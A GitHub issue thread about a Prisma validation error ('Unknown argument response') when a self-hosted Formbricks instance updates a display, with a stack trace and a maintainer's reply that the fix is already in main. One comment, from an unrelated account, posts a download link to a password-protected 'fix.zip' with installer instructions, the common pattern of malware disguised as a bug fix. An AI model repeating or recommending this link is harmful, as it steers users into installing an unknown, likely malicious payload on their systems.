### ISSUE TITLE
[BUG] Display Update Fails

### ISSUE THREAD

**Issue by jonas-hoebenreich** [formbricks/formbricks#3049]
### Issue Summary

We're getting the following message in our logs:

```
| Unknown argument `response`. Did you mean `responseId`? Available options are marked with ?.                                                                                                                      
│
│     at An (/home/nextjs/node_modules/@prisma/client/runtime/library.js:114:7526)
│     at _n.handleRequestError (/home/nextjs/node_modules/@prisma/client/runtime/library.js:121:7392)
│     at _n.handleAndLogRequestError (/home/nextjs/node_modules/@prisma/client/runtime/library.js:121:7057)
│     at _n.request (/home/nextjs/node_modules/@prisma/client/runtime/library.js:121:6741)
│     at async l (/home/nextjs/node_modules/@prisma/client/runtime/library.js:130:9355)
│     at async p (/home/nextjs/apps/web/.next/server/chunks/8215.js:1:16736)
│     at async p (/home/nextjs/apps/web/.next/server/app/api/v1/client/[environmentId]/displays/[displayId]/route.js:1:1082)
│     at async /home/nextjs/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:36258
│     at async eR.execute (/home/nextjs/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:26874)
│     at async eR.handle (/home/nextjs/node_modules/next/dist/compiled/next-server/app-route.runtime.prod.js:6:37512) {
│   clientVersion: '5.18.0'
│ }
│ PrismaClientValidationError:
│ Invalid `prisma.display.update()` invocation:
│
│ {
│   where: {
│     id: "abc" 
│   },
│   data: {
│     response: {
│     ~~~~~~~~
│       connect: {
│         id: "xyz"  
│       }
│     },
│ ?   id?: String | StringFieldUpdateOperationsInput,
│ ?   createdAt?: DateTime | DateTimeFieldUpdateOperationsInput,
│ ?   updatedAt?: DateTime | DateTimeFieldUpdateOperationsInput,
│ ?   responseId?: String | NullableStringFieldUpdateOperationsInput | Null,
│ ?   status?: DisplayStatus | NullableEnumDisplayStatusFieldUpdateOperationsInput | Null,
│ ?   survey?: SurveyUpdateOneRequiredWithoutDisplaysNestedInput,
│ ?   person?: PersonUpdateOneWithoutDisplaysNestedInput
│   },
│   select: {
│     id: true,
│     createdAt: true,
│     updatedAt: true,
│     surveyId: true,
│     responseId: true,
│     personId: true,
│     status: true
│   }
│ }                               
```

### Steps to Reproduce

1. Try to update display

### Expected behavior

update display works properly

### Environment

- [ ] Formbricks Cloud (app.formbricks.com)
- [X] Self-hosted Formbricks

### Desktop (please complete the following information)

```markdown
- v2.4.3
```

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mattinannt** [comment]
@jonas-hoebenreich Thanks for creating an issue. This issue was already solved in `main` and will be included in the next release :-)
